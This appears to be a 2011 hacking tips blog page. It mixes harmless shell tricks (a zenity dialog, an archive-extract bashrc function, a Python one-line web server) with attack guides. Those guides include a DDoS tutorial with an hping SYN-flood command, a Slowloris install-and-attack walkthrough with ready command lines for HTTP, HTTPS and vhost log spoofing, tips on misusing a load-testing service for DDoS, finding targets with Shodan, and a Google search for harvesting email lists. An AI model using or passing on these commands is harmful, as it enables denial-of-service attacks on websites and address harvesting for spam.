Sunday, May 1, 2011

How to find a target to your needs

Sometimes we find a crazy security hole and want to test if this is not just on our maschine. Or we just need a mail Server to try something out... Whatever sometimes we need a Target to our wishes.

And damn, there is an easy way how to find!
http://www.shodanhq.com/

You can Search like "port:22" or just "netgear". If you register (free) you will get more results and special ready to use search querys ^^

How to make a DDoS attack with an free Internet Tool

If you want to DDoS a Website, but dont have a good Computer to do so. Just use the free Webservice from http://loadimpact.com/

How to find lists with valid e-mail adresses with google

To do so just Google:

filetype:ctt "hotmail"

How to create an GTK Dialog Window from Terminal or Script

The answer is zenity!

Just take a look at this example:

zenity --warning --text "Example Warning\!\nSecond row...." --title "Example Title"

How to easily extract everything from Unix/Linux Shell

I dont know where i found this part of gold :D But its amazing and makes using your Shell on Desktop or Server much more easy.

Just add the following to your ~/.bashrc file:


extract () {
    if [ -f $1 ] ; then
        case $1 in
            *.tar.bz2)   tar xvjf $1        ;;
            *.tar.gz)    tar xvzf $1     ;;
            *.bz2)       bunzip2 $1       ;;
            *.rar)       unrar x $1     ;;
            *.gz)        gunzip $1     ;;
            *.tar)       tar xvf $1        ;;
            *.tbz2)      tar xvjf $1      ;;
            *.tgz)       tar xvzf $1       ;;
            *.zip)       unzip $1     ;;
            *.Z)         uncompress $1  ;;
            *.7z)        7z x $1    ;;
            *)           echo "'$1' cannot be extracted" ;;

        esac

    else

        echo "'$1' is not a valid file"

    fi

}

How to easily create an Webserver in any Path

This can be very useful in some time. Easily create an Webserver in any path you want using a simple Python Command
python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"
Make an Shortcut using:
alias webshare='python -c "import SimpleHTTPServer;SimpleHTTPServer.test()"'

How to DDoS Tutorial

So you want to DDoS something?
First please ask yourself why you want to do that?

DDoS can be very strong and effective. It also can be very poor and nonsense. Think about why you want to do that. If you use it only to protect your Personal rights and freedom then you can read the rest.

If you want to show your bro's how cool you are, get a sexy girlfriend or something this isnt the right way to do so.

And another thing, i dont get to deep in details. Just use Google, Google is your friend.


Who/What do i want to DDoS?

Keep youre plan real. So do you think you can alone DDoS something in the Amazon Cloud? You need firepower or you need a poor Target (you may kill a little  VPS by your own :P) 

Another serius question is which Port? Do an port Scan to clear that question. If you use Linux just:
nmap target.com 
Note SSL is mostly more effective. So may try port 443 instead of 80 and so on.



How to DDoS now?

You need a tool. Firstly you have to know which Operating System you use. I think you can answer this question. If youre running Linux this is perfect! You got everything you need to DDoS in full Power mode! Windows... yeah ... dudes just get Linux.

So now we know which Operating System we have ^^  

Now we need a good tool!
Windows users please note that many tools from Hackerforums and several download Sites are Backdoored and you will install an trojan + the tool. so try to find orginal resources!


Skiddies at the moment swear on LOIC. I dont think thats an really good Tool, but it has a GUI and is very easy to use.

if it is an Apache Webserver. Stop reading here and go to How to install and use Slowloris on Linux or try QSlowLoris, PyLoris or several.

If you know how to use a Shell try Pentbox its an amazing tool with unique features and a very good DDoS Syn flooder. Also its written in Ruby <3

If you are an X-Nerd and want the most direct Linux way, take a look at the package hping, example attack:
hping -i u1 -S -p 80 target.ip.or.domain


This are the most popular Tools at the moment. If you doing right you will have mighty tools in your hands.  Be nice <3

How to install and use Slowloris on Linux

Hey there...

so many people around the internet are asking how to use slowloris in linux...
Maybe Linux isnt the right OS for you if you cant handle this out :P

But, ill show you how!

First, there are many Slowloris now you can use... But i really would prefer you to use the orginal one in perl if youre running Linux. No clone seems so mighty like the orginal!


Lets how to install Slowloris
  1. Get a Copy if Slowlors http://ha.ckers.org/slowloris/
  2. sudo apt-get install perl (normally you got perl already)
  3. sudo apt-get install libio-socket-ssl-perl
  4. Now you should be ready to run slowloris.pl! 
  

Now lets learn how to use it!
  1. You need a Target. Be careful, slowloris can be very effective!
  2. cd /path/to/slowloris
  3. perl slowloris.pl -dns example.target.com - You startet youre first attack with Slowloris! 
But hold on... Isnt Slowloris a mighty Script with many different options?
Yes it is! So lets take a look at them:

Maybe you want to set the Port Slowloris is flooding to?
./slowloris.pl -dns www.example.com -port 80
 Now lets add the Number of Sockets you want to open. The more the better :D
./slowloris.pl -dns www.example.com -port 80 -num 500 
 Now lets attack some HTTPS! Sometimes this is damn more effective than HTTP
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https

Now you have seen the Basics of attacking with slowloris. There is another funny build in trick you might want to know. If you know that the Server is running several virtual hosts you can send the log to an other vhost than you are attacking!

./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com 

If you want to now more just ready the Source :P Its pretty easy
If you arent able to read Perl - Source try perldoc slowloris.pl as command, you need to be in the same directory and have the perl-doc package installed. This would print the whole orginal Slowloris Tutorial!